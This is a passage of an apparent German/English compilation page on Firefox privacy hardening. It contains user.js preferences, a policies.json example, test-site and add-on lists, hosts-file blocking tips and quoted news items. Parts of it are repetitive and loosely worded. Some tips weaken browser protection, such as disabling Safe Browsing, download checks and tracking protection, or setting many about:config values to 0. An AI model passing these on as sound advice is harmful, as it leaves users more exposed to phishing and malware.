browser.pagethumbnails.capturing_disabled // user_pref("pageThumbs.enabled", false); // 2408: (31+) disable network API - fingerprinting vector // user_pref("dom.network.enabled", false); // 2620: (35+) disable WebSockets // https://developer.mozilla.org/en-US/Firefox/Releases/35 // user_pref("network.websocket.enabled", false); // 2023: (37+) disable camera autofocus callback (was in 36, not in 37) // Not part of any specification, the API will be superceded by the WebRTC Capture // and Stream API ( http://w3c.github.io/mediacapture-main/getusermedia.html ) // https://developer.mozilla.org/en-US/docs/Mozilla/Firefox_OS/API/CameraControl/ // user_pref("camera.control.autofocus_moving_callback.enabled", false); // 1804: (41+) disable plugin enumeration // user_pref("plugins.enumerable_names", ""); // 0420: (42+) disable tracking protection // this particular pref was never in stable // labelled v42+ because that´s when tracking protection landed // user_pref("browser.polaris.enabled", false); // 2803: (42+) what to clear on shutdown // https://bugzilla.mozilla.org/show_bug.cgi?id=1102184#c23 // user_pref("privacy.clearOnShutdown.passwords", false); // 0411: (43+) disable safebrowsing urls &download // user_pref("browser.safebrowsing.gethashURL", ""); // user_pref("browser.safebrowsing.malware.reportURL", ""); // user_pref("browser.safebrowsing.provider.google.appRepURL", ""); // user_pref("browser.safebrowsing.reportErrorURL", ""); // user_pref("browser.safebrowsing.reportGenericURL", ""); // user_pref("browser.safebrowsing.reportMalwareErrorURL", ""); // user_pref("browser.safebrowsing.reportMalwareURL", ""); // user_pref("browser.safebrowsing.reportURL", ""); // user_pref("browser.safebrowsing.updateURL", ""); // 0420: (43+) disable tracking protection. FF43+ URLs are now part of safebrowsing // https://wiki.mozilla.org/Security/Tracking_protection (look under Prefs) // NOTE: getupdateURL = WRONG / never existed. updateURL = CORRECT and has been added FYI // user_pref("browser.trackingprotection.gethashURL", ""); // user_pref("browser.trackingprotection.getupdateURL", ""); // user_pref("browser.trackingprotection.updateURL", ""); // 1803: (43+) remove plugin finder service // http://kb.mozillazine.org/Pfs.datasource.url // user_pref("pfs.datasource.url", ""); // 2403: (43+) disable scripts changing images - test link below // http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_img_src2 // WARNING: will break some sites such as Google Maps and a lot of web apps // user_pref("dom.disable_image_src_set", true); // 2615: (43+) disable http2 for now as well // user_pref("network.http.spdy.enabled.http2draft", false); // 3001a: (43+) disable warning when a domain requests full screen // replaced by setting full-screen-api.warning.timeout to zero // user_pref("full-screen-api.approval-required", false); // 3003: (43+) disable new search panel UI [Classic Theme Restorer can restore the old search] // user_pref("browser.search.showOneOffButtons", false); // 1201: (44+) block rc4 whitelist // https://developer.mozilla.org/en-US/Firefox/Releases/44#Security // user_pref("security.tls.insecure_fallback_hosts.use_static_list", false); // 2417: (44+) disable SharedWorkers, which allow the exchange of data between iFrames that // are open in different tabs, even if the sites do not belong to the same domain. // https://www.torproject.org/projects/torbrowser/design/#identifier-linkability (no. 8) // https://bugs.torproject.org/15562 // is used in FF 45and 46 code once, to set it for a test // user_pref("dom.workers.sharedWorkers.enabled", false); // 1005: (45+) disable deferred level of storing extra session data 0=all 1=http-only 2=none // user_pref("browser.sessionstore.privacy_level_deferred", 2); // 0334b: (46+) disable FHR (Firefox Health Report) v2 data being sent to Mozilla servers // user_pref("datareporting.policy.dataSubmissionEnabled.v2", false); // 0373: (46+) disable "Pocket". FF46 replaced these with extensions.pocket.* // user_pref("browser.pocket.enabled", false); // user_pref("browser.pocket.api", ""); // user_pref("browser.pocket.site", ""); // user_pref("browser.pocket.oAuthConsumerKey", ""); // 0410e: (46+) safebrowsing // user_pref("browser.safebrowsing.appRepURL", ""); // Google application reputation check // 0333b: (47+) disable about:healthreport page UNIFIED // user_pref("datareporting.healthreport.about.reportUrlUnified", "data:text/plain,"); // 0807: (47+) disable history manipulation // https://developer.mozilla.org/en-US/docs/Web/Guide/API/DOM/Manipulating_the_browser_history // WARNING: if set to false it breaks some sites (youtube) ability to correctly show the // url in location bar and for the forward/back tab history to work // user_pref("browser.history.allowPopState", false); // user_pref("browser.history.allowPushState", false); // user_pref("browser.history.allowReplaceState", false); // 0806: (48+) disable ´unified complete´: ´Search with [default search engine]´ // this feature has been added back in Classic Theme Restorer // http://techdows.com/2016/05/firefox-unified-complete-aboutconfig-preference-removed.html // user_pref("browser.urlbar.unifiedcomplete", false); // 3006: (48+) disable enforced add-on signing // NOTE: the preference is still in FF48+, but it´s legacy code and does not work in stable // user_pref("xpinstall.signatures.required", false); // 0372: (49+) disable "Hello" (TokBox/Telefonica WebRTC voice &video call PUP) WebRTC (IP leak) // https://www.mozilla.org/en-US/privacy/firefox-hello/ // https://security.stackexchange.com/questions/94284/how-secure-is-firefox-hello // https://support.mozilla.org/en-US/kb/hello-status // user_pref("loop.enabled", false); // user_pref("loop.server", ""); // user_pref("loop.feedback.formURL", ""); // user_pref("loop.feedback.manualFormURL", ""); // additional facebook loop settings // user_pref("loop.facebook.appId", ""); // user_pref("loop.facebook.enabled", false); // user_pref("loop.facebook.fallbackUrl", ""); // user_pref("loop.facebook.shareUrl", ""); // https://groups.google.com/d/topic/mozilla.dev.platform/nyVkCx-_sFw/discussion // user_pref("loop.logDomains", false); // 2202: (49+) ONE of the new window UI prefs // user_pref("dom.disable_window_open_feature.scrollbars", true); // 2431: (49+) disable ONE of the push notification prefs // user_pref("dom.push.udp.wakeupEnabled", false); // 0308: (50+) disable update plugin notifications // if using Flash/Java/Silverlight, it is best to turn on their own auto-update mechanisms. // See 1804 below: Mozilla only checks a few plugins and will soon do away with NPAPI // user_pref("plugins.update.notifyUser", false); // 0410a: (50+) "Block dangerous and deceptive content" pref name change // user_pref("browser.safebrowsing.enabled", false); // FF49 and earlier // 1202: (50+) disable rc4 ciphers // https://www.fxsitecompat.com/en-CA/docs/2016/rc4-support-has-been-completely-removed/ // https://trac.torproject.org/projects/tor/ticket/17369 // user_pref("security.ssl3.ecdhe_ecdsa_rc4_128_sha", false); // user_pref("security.ssl3.ecdhe_rsa_rc4_128_sha", false); // user_pref("security.ssl3.rsa_rc4_128_md5", false); // user_pref("security.ssl3.rsa_rc4_128_sha", false); // 1809: (50+) remove Mozilla´s plugin update URL // user_pref("plugins.update.url", ""); // 1851: (51+) delay play of videos until they´re visible // https://bugzilla.mozilla.org/show_bug.cgi?id=1180563 // user_pref("media.block-play-until-visible", true); // 2504: (51+) disable virtual reality devices // user_pref("dom.vr.oculus050.enabled", false); // 2614: (51+) disable SPDY // user_pref("network.http.spdy.enabled.v3-1", false); /**- 9998: TO INVESTIGATE - TOR UPLIFT https://wiki.mozilla.org/Security/Tor_Uplift/Tracking // RESOLVED // 1400´s: set whitelisted system fonts only (FF52+) // If whitelist is empty, then whitelisting is considered disabled and all fonts are allowed. // https://bugzilla.mozilla.org/show_bug.cgi?id=1121643 // user_pref("font.system.whitelist", ""); // 2698-append: privacy.firstparty.isolate.restrict_opener_access // https://bugzilla.mozilla.org/show_bug.cgi?id=1319773 // ACTIVE // 1200´s: Isolate the HSTS and HPKP cache by first party domain // https://bugzilla.mozilla.org/show_bug.cgi?id=1323644 // 2400´s: reduce precision of time exposed by javascript // https://bugzilla.mozilla.org/show_bug.cgi?id=1217238 // user_pref("javascript.options.privacy.reduce_time_precision", true); // 2699-append: resource: // URIs leak // https://trac.torproject.org/projects/tor/ticket/8725 // https://bugzilla.mozilla.org/show_bug.cgi?id=863246 // test: https://www.browserleaks.com/firefox // ASSIGNED // 2001: preference to fully disable WebRTC JS API // https://bugzilla.mozilla.org/show_bug.cgi?id=1314443 // 2699-append: enable fingerprinting resistence to WebGL // https://bugzilla.mozilla.org/show_bug.cgi?id=1217290 // 2699-append: checkbox in about#preferences#privacy for privacy.resistFingerprinting // when this lands, add note to 2699 // https://bugzilla.mozilla.org/show_bug.cgi?id=1308340 // 2699-append: use UTC timezone (spoof as UTC 0) // https://bugzilla.mozilla.org/show_bug.cgi?id=1330890 // 2699-append: new window sizes to round to hundreds // Note: override values, future may enforce a select set of (inner) window measurements // If override values are too big, the code falls back and determines it for you // https://bugzilla.mozilla.org/show_bug.cgi?id=1330882 // user_pref("privacy.window.maxInnerWidth", 1366); // user_pref("privacy.window.maxInnerHeight", 768); // BACKLOG // 1400´s: prevent local font enumeration // https://bugzilla.mozilla.org/show_bug.cgi?id=732096 // 1800´s: disable "This Plugin is Disabled" overlay // https://bugzilla.mozilla.org/show_bug.cgi?id=967979 // user_pref("privacy.plugin_disabled_barrier.enabled", false); // 2500´s: disable/mitigate canvas fingerprinting // https://bugzilla.mozilla.org/show_bug.cgi?id=1041818 // 2500´s: enable prompt (site permission) before allowing canvas data extraction // https://bugzilla.mozilla.org/show_bug.cgi?id=967895 // 2600´s: window.name // https://bugzilla.mozilla.org/show_bug.cgi?id=444222 // 2698-append: checkbox in about:preferences#privacy for privacy.firstparty.isolate // when this lands, add note to 2611 // https://bugzilla.mozilla.org/show_bug.cgi?id=1312655 // 2698-append: FPI and HTTP Alternative Services (see 2666) // https://bugzilla.mozilla.org/show_bug.cgi?id=1334690 // 2698-append: FPI and SPDY/HTTP2 // https://bugzilla.mozilla.org/show_bug.cgi?id=1334693 // 2699-append: disable keyboard fingerprinting // Test: https://w3c.github.io/uievents/tools/key-event-viewer.html // https://bugzilla.mozilla.org/show_bug.cgi?id=1222285 // 2699-append: disable WebSpeech API // https://bugzilla.mozilla.org/show_bug.cgi?id=1333641 // see also: web speech exposes TTS engines // https://bugzilla.mozilla.org/show_bug.cgi?id=1233846 // 2699-append: spoof Navigator API // https://bugzilla.mozilla.org/show_bug.cgi?id=1333651 // 2699-append: set and enforce various prefs with privacy.resistFingerprinting // https://bugzilla.mozilla.org/show_bug.cgi?id=1333933 // 2699-append: bundle and whitelist fonts with privacy.resistFingerprinting // https://bugzilla.mozilla.org/show_bug.cgi?id=1336208 ***/ /**- 9999: TO INVESTIGATE - OTHER // 1600´s: restrict the contents of referrers attached to cross-origin requests (FF52+) // 0- 1- 2-scheme+hostname+port // user_pref("network.http.referer.XOriginTrimmingPolicy", 2); // 1600´s: default referrer fallback override? (FF52+?) // 0-no-referer 1-same-origin 2-strict-origin-when-cross-origin // 3-no-referrer-when-downgrade (default) // https://bugzilla.mozilla.org/show_bug.cgi?id=1304623 // user_pref("network.http.referer.userControlPolicy", 3); // 3000´s: show system add-ons in about:addons (so you can enable/disable them) - NOT landed yet // https://bugzilla.mozilla.org/show_bug.cgi?id=1231202 // user_pref("extensions.hideSystemAddons", false); // (hidden pref) // ^^ keep an eye on extensions.systemAddon* prefs // dom.presentation.* // privacy.userContext.* (Containers) // use a private container for thumbnail loads (FF51+) // user_pref("privacy.usercontext.about_newtab_segregation.enabled", true); // browser.newtabpage.remote* // user_pref("browser.formfill.expire_days", 1); // user_pref("javascript.options.shared_memory", false); // user_pref("plugin.disable_full_page_plugin_for_types", "application/pdf"); // network.http.enablePerElementReferrer // history.length XSHM fix // https://bugzilla.mozilla.org/show_bug.cgi?id=1315203 // sandbox levels (recommended to leave at what Firefox sets it to) // http://www.ghacks.net/2017/01/23/how-to-change-firefoxs-sandbox-security-level/ // security.sandbox.content.level ***/ /**- APPENDIX A: TEST SITES Here is an exhaustive list of various websites in which to test your browser. You should enable JS on these sites for the tests to present a worst-case scenario. In reality, you should control JS and XSS (cross site scripting) on sites with add-ons such as NoScript, uMatrix, uBlock Origin, among others, to reduce the possibility of fingerprinting attacks. url: http://www.ghacks.net/2015/12/28/the-ultimate-online-privacy-test-resource-list/ // * 01: Fingerprinting Panopticlick https://panopticlick.eff.org/ JoDonym http://ip-check.info/?lang=en Am I Unique? https://amiunique.org/ Browserprint https://browserprint.info/test // * 02: Multiple Tests [single page] Whoer https://whoer.net/ 5who http://5who.net/?type=extend IP/DNS Leak https://ipleak.net/ IP Duh http://ipduh.com/anonymity-check/ // * 03: Multiple Tests [multi-page] BrowserSpy.dk http://browserspy.dk/ BrowserLeaks https://www.browserleaks.com/ HTML Security https://html5sec.org/ PC Flank http://www.pcflank.com/index.htm // * 04: Encryption / Ciphers / SSL/TLS / Certificates BadSSL https://badssl.com/ DCSec https://cc.dcsec.uni-hannover.de/ Qualys SSL Labs https://www.ssllabs.com/ssltest/viewMyClient.html Fortify https://www.fortify.net/sslcheck.html How´s My SSL https://www.howsmyssl.com/ RC4 https://rc4.io/ Heartbleed https://filippo.io/Heartbleed/ Freak Attack https://freakattack.com/clienttest.html Logjam https://weakdh.org/ Symantec https://cryptoreport.websecurity.symantec.com/checker/views/sslCheck.jsp // * 05: Other AudioContext https://audiofingerprint.openwpm.com/ Battery https://pstadler.sh/battery.js/ DNS Leak https://www.dnsleaktest.com/ DNS Spoofability https://www.grc.com/dns/dns.htm Evercookie https://samy.pl/evercookie/ Firefox Add-ons http://thehackerblog.com/addon_scanner/ localStorage http://www.filldisk.com/ HSTS Supercookie http://www.radicalresearch.co.uk/lab/hstssupercookies HSTS [sniffly] https://zyan.scripts.mit.edu/sniffly/ HTML5 https://www.youtube.com/html5 Keyboard Events https://w3c.github.io/uievents/tools/key-event-viewer.html rel=noopener https://mathiasbynens.github.io/rel-noopener/ Popup Killer http://www.kephyr.com/popupkillertest/index.html Popup Test http://www.popuptest.com/ Redirects https://jigsaw.w3.org/HTTP/300/Overview.html Referer Headers https://www.darklaunch.com/tools/test-referer Resouce: // URI https://www.browserleaks.com/firefox WebRTC IP Leak https://www.privacytools.io/webrtc.html // * 06: Safe Browsing, Tracking Protection Attack https://itisatrap.org/firefox/its-an-attack.html Blocked https://itisatrap.org/firefox/blocked.html Malware https://itisatrap.org/firefox/unwanted.html Phishing https://itisatrap.org/firefox/its-a-trap.html Tracking https://itisatrap.org/firefox/its-a-tracker.html ***/ /**- APPENDIX B: FIREFOX ADD-ONS A massive thank you to all the developers and online communities who provide and maintain these. Sometimes preferences alone are not enough. Here is a list of some essential addons for security, privacy, and fingerprinting protection. This is not a debate, it´s just a list covering JS, XSS, AdBlocking, cookies, DOM Storage, UTM, redirects, and other items. Some are global, others allow granular control. While I believe most of these are the very best of the best, this can be subjective depending on your needs. Some of these may become obsolete with upcoming FF changes (canvas, resource: // URI), some of these are debatable (should we UA spoof?), some I´m still looking for a better solution, and some I do not use but they will suit a lot of users. NoScript https://addons.mozilla.org/en-US/firefox/addon/noscript/ uBlock Origin https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/ uMatrix https://addons.mozilla.org/en-US/firefox/addon/umatrix/ *Cookie Controller https://addons.mozilla.org/en-US/firefox/addon/cookie-controller/ *Self-Destructing Cookies https://addons.mozilla.org/en-US/firefox/addon/self-destructing-cookies/ HTTPS Everywhere https://addons.mozilla.org/en-US/firefox/addon/https-everywhere/ CanvasBlocker https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/ No Resource URI Leak https://addons.mozilla.org/en-US/firefox/addon/no-resource-uri-leak/ Decentraleyes https://addons.mozilla.org/en-US/firefox/addon/decentraleyes/ NoRedirect https://addons.mozilla.org/en-US/firefox/addon/noredirect/ UAControl https://addons.mozilla.org/en-US/firefox/addon/uacontrol/ User-Agent JS Fixer https://addons.mozilla.org/en-US/firefox/addon/user-agent-js-fixer/ Popup Blocker Ultimate https://addons.mozilla.org/en-US/firefox/addon/popup-blocker-ultimate/ Pure URL https://addons.mozilla.org/en-US/firefox/addon/pure-url/ **Google Privacy https://addons.mozilla.org/en-US/firefox/addon/google-privacy/ ***Quick Java https://addons.mozilla.org/en-US/firefox/addon/quickjava/ * Don´t use both cookie add-ons ** Yes, I use google search sometimes (my choice). I have some global add-ons that address tracking in URLS, but am still looking for a working, comprehensible solution. *** It´s not just Java! Covers JS, Cookies, Java, Flash... and more. Customisable controls and defaults NOTE: At the time of publication the following are not e10s compatible: Google Privacy, NoRedirect, UAControl, User-Agent JS Fixer, Popup Blocker Ultimate ***/ /usr/lib64/firefox/distribution/policies.json, examples and explanation see wiki.kairaven.de // Pale Moon, https://www.ghacks.net/2015/08/18/a-comprehensive-list-of-firefox-privacy-and-security-settings/ // // 9996-1: (v25.6+) disable canvas fingerprinting user_pref("canvas.poisondata", true); // 9996-2: (v25.2+) control HSTS // If editing this in about:config PM needs to be fully closed and then restarted // NOTE: This is a trade-off between privacy vs security. HSTS was designed to increase // security to stop MiTM attacks but can also be misused as a fingerprinting vector, by // scrapping previously visited sites. Recommended: security over privacy. Your choice. user_pref("network.stricttransportsecurity.enabled", true); user_pref("privacy.resistFingerprinting", true); // 9996-3: (v25.0+) controls whether to ignore an expired state of stapled OCSP responses // If set to true, breaks with RFC6066 (like Firefox) and ignores the fact that stapled // OCSP responses may be expired. If false (the default) aborts the connection. user_pref("security.ssl.allow_unsafe_ocsp_response", false); // 9996-5: (v26.0+) read Moonchild´s description on the palemoon forum thread linked above user_pref("dom.disable_beforeunload", false); /usr/lib64/firefox/distribution/policies.json, examples and explanation see wiki.kairaven.de { "policies": { "BlockAboutProfiles": true, "DisableAppUpdate": true, "DisableBuiltinPDFViewer": true, "DisableFeedbackCommands": true, "DisableFirefoxAccounts": true, "DisableFirefoxScreenshots": true, "DisableFirefoxStudies": true, "DisableFormHistory": true, "DisableMasterPasswordCreation": true, "DisablePocket": true, "DisableProfileImport": true, "DisableProfileRefresh": true, "DisableSetDesktopBackground": true, "DisableSystemAddonUpdate": true, "DisableTelemetry": true, "DisplayBookmarksToolbar": true, "DisplayMenuBar": true, "DontCheckDefaultBrowser": true, "EnableTrackingProtection": { "Locked": true, "Value": false }, "FlashPlugin": { "Default": false, "Locked": true }, "Homepage": { "Locked": true, "URL": "https://host.domain.tld/" }, "InstallAddonsPermission": { "Default": true }, "OfferToSaveLogins": false, "OverrideFirstRunPage": "", "OverridePostUpdatePage": "", "PopupBlocking": { "Default": true }, "SearchBar": "separate" } } This is not enough! Lookout for all URI resp. URI, for example "http" and ".com" within the listing obtained by about:config and remove quit all of them with some care. More entries: http://kb.mozillazine.org/About:config_Entries By default your browser trusts 100´s of Certificate Authorities (CAs) from various organizations to guarantee privacy of your encrypted communications with websites. Some CAs have been known for misusing or deliberately abusing this power in the past, and a single malicious CA can compromise all your encrypted communications! Follow this document to only trust a selected, trimmed-down list of CAs. Uhrzeit und Zeitzone sollten noch auf einen anderen Wert als den eigentlichen lokalen vor Ort gesetzt werden. Firefox (52.9) bezieht sich auf die Systemzeit (bitte setzen!). Set quit all large numbers in about:config resp. user.js to 0 resp. -1, for example the last update times of the browser and its extensions. Further hardening This still is not enough too! Here´s some other tips how you can further harden Firefox (52.9): By default your browser trusts 100´s of Certificate Authorities (CAs) from various organizations to guarantee privacy of your encrypted communications with websites. Some CAs have been known for misusing or deliberately abusing this power in the past, and a single malicious CA can compromise all your encrypted communications! Follow this document to only trust a selected, trimmed-down list of CAs. Keep your browser updated! If you check Firefox´s security advisories, you´ll see that pretty much every new version of Firefox contains some security updates. If you don´t keep your browser updated, you´ve already lost the game. Disable/uninstall all unnecessary extensions and plugins! Use long and unique passwords/passphrases for each website/service. Prefer open-source, reviewed and audited software and operating systems whenever possible. Do not transmit information meant to be private over unencrypted communication channels. Use a search engine that doesn´t track its users, and set it as default search engine. If a plugin is absolutely required, check for plugin updates Create different profiles for different purposes Change the Firefox´s built-in tracking protection to use the strict list Change the timezone for Firefox by using the TZ environment variable (see here) to reduce it´s value in browser fingerprinting If you are concerned about more advanced threats, use specialized hardened operating systems and browsers such as Tails or Tor Brower Bundle Disable Safe Browsing service Safe Browsing offers phishing protection and malware checks, however it may send user information (e.g. URL, file hashes, etc.) to third parties like Google. To disable the Safe Browsing service, in about:config set: browser.safebrowsing.malware.enabled to false browser.safebrowsing.phishing.enabled to false In addition disable download checking, by setting browser.safebrowsing.downloads.enabled to false. Set a new timezone, set the timezone by starting firefox through the command: TZ=UTC firefox https://github.com/pyllyukko/user.js#download https://wiki.archlinux.org/index.php/Firefox_privacy#Change_browser_time_zone Bei wiki.kairaven.de schlug bei uns die Konfiguration übeschriebener Werte von Firefox über mozilla.cfg zunächst fehl. Nachdem die Werte aus dieser Datei aber direkt in defaults/pref/local-settings.js eingetragen worden waren, ließ sich Firefox konfigurieren. OCSP sollte in user.js auf 0 gesetzt sein, andernfalls schlägt die Verbindungsaufnahme fehl. about: about:addons about:blank about:blocked about:certerror about:config about:crashes about:feeds about:home about:memory about:neterror about:newtab about:plugins about:pocket-saved about:pocket-signup about:preferences about:privatebrowsing about:sessionrestore about:srcdoc about:support about:tabcrashed ... Es gibt aber auch Einträge, die man über das Menü nicht findet. Wer mehr über Abstürze wissen will, kann sich in "about:crashes" die Absturzberichte reinziehen, "about:telemetry" informiert über Browser-Hänger und verzögerte Schreibvorgänge. Über "about:memory" können Sie Details zur Speicherbelegung einsehen und über einen kleinen Schalter bei "Free memory" sogar die Speichernutzung minimieren. Hinter "about:performance" verbirgt sich übrigens der Firefox-eigene Task-Manager und "about:profiles" informiert über verschiedene Firefox-Profile auf dem Rechner. https://www.chip.de/news/Firefox-Diese-Features-kennen-Sie-noch-nicht_93266205.html Inkognito-Modus: Privatsphäre beim Surfen schützen, PC-WELT.de, 06.04.2018 Sowohl der Windows-10-Browser Edge als auch Google Chrome und Firefox bieten einen Modus, der beim Surfen keinerlei Spuren auf dem PC zurücklässt. So nutzen Sie ihn zuverlässig. [...] Firefox-Nutzer klicken oben rechts auf den Menüknopf mit den drei Balken und dann auf "Privates Fenster". Oder drücken Sie Strg-Umschalt-P. https://www.pcwelt.de/a/inkognito-modus-privatsphaere-beim-surfen-schuetzen,3450334 Browser Display Statistics - W3Schools Screen Resolution Statistics. As of January 2017, about 95% of our visitors have a screen resolution of 1024x768 pixels or higher. www.w3schools.com/browsers/browsers_display.asp Mit /etc/hosts Google-Schriften und Werbung blockieren Das Nachladen externer Schriften durch eine Webseite ist meist überflüssig, kostet Performance und kann potenziell ein Tracking-Problem darstellen. http://netz10.de/2014/02/10/googles-schriften-blockieren In diesem Gastartikel, möchte ich dir eine wirklich sehr simple Möglichkeit nahebringen, Werbung im Internet effektiv zu blockieren. Werbung blockieren mit Bordmitteln Wie du sicherlich weißt, gibt es zahlreiche Plugins für die verschiedensten Browser, mit dessen Hilfe man unerwünschte Werbung aus Webseiten herausfiltern kann. Was viele Menschen nicht wissen: Es geht jedoch auch noch einfacher und zwar ganz ohne den Einsatz von Zusatzsoftware. Der Vorteil der von mir vorgestellten Methode ist, dass nicht nur die Werbung beim Surfen mit dem Browser blockiert wird, sondern die gesamte Werbeauslieferung zu deinem System. Das heißt, dass so auch die Werbung im Emailclient oder im Messagingprogramm keine Chance mehr hat. In jedem Windowssystem existiert im Ordner c:windowssystem32driveretc eine Datei namens "hosts". Falls du mit dem freien Betriebssystem Linux arbeitest, so ist diese Datei im Verzeichnis /etc/ zu finden. Die Systax ist analog zur Windowsvariante. Mit Hilfe dieser Datei, kann man einem beliebigen Hostnamen eine "feste" IP zuweisen. Der Name wird zukünftig nicht mehr per DNS aufgelöst. Zur Erklärung für die Nicht-TI-ler: Wenn man einen Adresse im Browser eingibt, so wird zuerst in der hosts-Datei nachgeschaut, ob die Zieladresse bereits bekannt ist. Falls die Adresse nicht bekannt ist, wird der DNS-Server (Nameserver des Providers) gefragt. Dieser liefert dann die zur Adresse gehörige IP-Adresse zurück und dein Rechner kann Kontakt zum Zielcomputer aufnehmen. [...] Eine Liste mit Adressen bekannter Werbeanbieter, die gesperrt werden können, findest du hier: http://www.mvps.org/winhelp2002/hosts.txt Du musst sie nur noch in deine hosts-Datei einfügen. [...] Die Auslieferung an den Browser ist hier nur beispielsweise genannt, analog werden natürlich auch Anfragen vom Emailclient oder Messagingprogramm behandelt und entsprechend umgeleitet. Zusätzlich zum Blockieren von Werbung kannst du dieses Vorgehen auch nutzen um diverse Programme vom "Nach-Hause-Telefonieren" abzuhalten, wie es viele Produkte von Microsoft oder google gerne machen. http://www.plerzelwupp.de/werbung-effektiv-blocken-ohne-zusatzsoftware/ WordPress-Plug-in Popup Builder Angreifer bedienen sich der beliebten Webseiten-Erstellung Wordpress. Mehrere Updates sind nötig, damit User sicher bleiben, trojaner-info.de, 10.02.2021 Admins, die auf ihren WordPress-Websites das Plug-in Popup Builder einsetzen, sollten es zeitnah auf den aktuellen Stand bringen. Ansonsten könnten Angreifer Seiten attackieren und beispielsweise Newsletter mit Links zu Malware verschicken oder Seiten-Abonnenten löschen. https://www.trojaner-info.de/business-security/aktuell/wordpress-plug-in-popup-builder-8177.html WordPress: Spam-IP per .htaccess sperren,perun.net So alle 3-4 Wochen gibt es einen Scherzkeks der witzig findet eine kleine Spam-Attacke auf dieses Blog zu starten. Neulich war es jemand aus China und ... http://www.perun.net/2012/03/05/wordpress-spam-ip-per-htaccess-sperren/ Linux: mittels hosts.allow und hosts.deny IP-Adressen sperren, 15.11.2016 Sollen bestimmte IP-Adressen oder Netzbereiche für den Zugriff auf einen Server gesperrt werden, so gibt es mehrere Möglichkeiten: iptables ist eine komplexe Firewall über die .htaccess IPs für den Zugriff auf den Webserver sperren über die Dateien /etc/hosts.allow und /etc/hosts.deny IPs für einige Dienste sperren In diesem Beitrag spreche ich die letztgenannte Möglichkeit an Als erstes sollte der localhost in /etc/hosts.allow eingetragen werden, damit der sich nicht selbst aussperren kann: ALL: 127.0.0.1,localhost Hier gehören zusätzlich weitere IPs/Full Qualified Domain Names hinein, die immer Zugriff erhalten sollen. Folgende Einträge sind in der /etc/hosts.deny möglich und dienen zum Sperren von IP-Adressen oder Netzbereichen: # IP 1.2.3.4 komplett sperren: ALL: 1.2.3.4 # Alle Adressen im Netz 4.5.6.x sperren (Netzmaske 4.5.6.0/24) # Jede der Zeilen ist eine mögliche Eingabeform und bewirken das gleiche: ALL: 4.5.6. ALL: 4.5.6.0/24 ALL: 4.5.6.0/255.255.255.0 Es besteht die Möglichkeit die Sperren einzuschränken - in diesen Beispielen sperre ich alles aus (erkennbar am ALL). Für Details siehe man-Page zu hosts.deny. Seien Sie aber vorsichtig: Sie können sich versehentlich selbst aussperren! Schalten Sie daher Ihre eigene IP vorher in /etc/hosts.allow frei. https://www.it-muecke.de/node/20161115-hosts-allow-und-deny Firefox Tuning zur Absicherung und Anonymisierung Auf dieser Seite werden Einstellungen für den aktuellen Firefox ESR Webbrowser aufgeführt, die grafisch über die Firefox-Einstellungen, manuell in der erweiterten Konfiguration über about:config oder über Erweiterungen vorgenommen werden können. Die Einstellungen betreffen die Absicherung und/oder Anonymisierung der Browsernutzung sowie die mögliche Begrenzung der Firefox-Funktionen auf seine Kernaufgabe: Webinhalte anzuzeigen. https://wiki.kairaven.de/open/app/firefox Software::Browser Firefox erbt weitere Funtionen von Tor-Browser, PRO-LINUX, 05.12.2017 Im zu Ende gehenden Jahr hat Firefox einige Funktionen vom Tor-Browser geerbt, der seinerseits auf Firefox ESR basiert. Mozilla Foundation Bereits seit 2014 arbeiten Mozilla und das Tor-Projekt zusammen, um die Sicherheit von Firefox zu erhöhen. Seit den Nightly Builds von Firefox 50 fließen unregelmäßig Patches vom Tor-Browser zu Mozilla zurück. Einer der ersten Patches im Jahr 2016 betraf die Eindämmung von Browser-Fingerprinting. Weitere Patches folgten im Rahmen des "Tor Patch Uplifting"-Projekts. Alle diese Patches sind und bleiben laut Aussage von Mozilla deaktiviert und müssen vom Anwender per about:config aktiviert werden. Der Grund hierfür ist, dass manche der Patches restriktiv wirken und beispielsweise die Darstellung von Webseiten verändern oder blockieren. Der Code von Tor-Browser entspricht zu 95 Prozent dem von Firefox ESR. Die restlichen 5 Prozent sind größtenteils Patches für Sicherheit und Schutz der Privatsphäre. Diese Patches für Firefox verfügbar zu machen verbessert nicht nur Firefox, sondern erspart dem Tor-Browser-Team die Arbeit, bei jeder neuen Version die Patches erneut zu aktualisieren, wie das Tor-Browser-Team berichtet. Der erste Patch, der im Rahmen von "Tor Patch Uplifting" in Firefox 50 im August integriert wurde, war "First-Party Isolation". Diese Funktion beschränkt den Zugriff auf Cookies, Cache und andere Daten auf die Domain-Ebene, so dass nur die Domain, die das Cookie oder die Datei auf dem Benutzersystem abgelegt hat, darauf zugreifen kann. Damit soll das Tracking von Anwendern erschwert werden. Bei Tor heißt die Funktion "Cross-Origin Identifier Unlinkable". Ein weiter Patch aus dem Tor-Projekt, der erst in Firefox 58 integriert sein wird, wenn dieser im Januar 2018 veröffentlicht wird, soll den Schutz vor HTML-Canvas-Fingerprinting erhöhen. http://www.pro-linux.de/news/1/25406/firefox-erbt-weitere-funktionen-von-tor-browser.html about:config?filter=privacy.firstparty.isolate true https://browserengine.net/how-to-enable-first-party-isolation-in-firefox/ Darknet-Browser Tor für Android fertig: Am Handy komplett anonym surfen, CHIP, 27.05.2019 Der Tor-Browser gilt als Symbol für anonymes Surfen im Internet und einfachster Weg ins Darknet. Nun wurde die fertige Version des Browsers im Google Play Store veröffentlicht. Wir zeigen Ihnen, wie Sie damit auf Ihrem Android-Smartphone über das Tor-Netzwerk surfen. https://www.chip.de/news/Darknet-Browser-Tor-fuer-Android-fertig-Am-Handy-komplett-anonym-surfen_148414180.html Firefox - The Fox hole Even with everything we´ve done, you´re still vulnerable to being tracked and profiled, however you´re in a better position now then when you started out, except for one little problem: Your Internet Service Provider! At the very least your ISP can see what websites you visit, when you´re surfing the web and when you´re not. They may even inject ads, malware or other garbage in your data stream. The solution: Hijack your neighbors unprotected WiFi and... Kidding! https://12bytes.org/articles/tech/firefox/the-firefox-privacy-guide-for-dummies Encryption won´t stop your internet provider from spying on you, The Atlantic Data patterns alone can be enough to give away what video you´re watching on YouTube. https://www.theatlantic.com/technology/archive/2017/03/encryption-wont-stop-your-internet-provider-from-spying-on-you/521208/ What you can do against this: try VPN and/or TOR. We talk about both soon, later on in our excurs! Überwachung 36 Millionen Euro: ZITiS baut Supercomputer zur Entschlüsselung, netzpolitik.org, 16.10.2018 Die Hacker-Behörde ZITiS will einen Hochleistungsrechner bauen, um verschlüsselte Daten zu entziffern. Das geht aus dem 36 Millionen Euro teuren 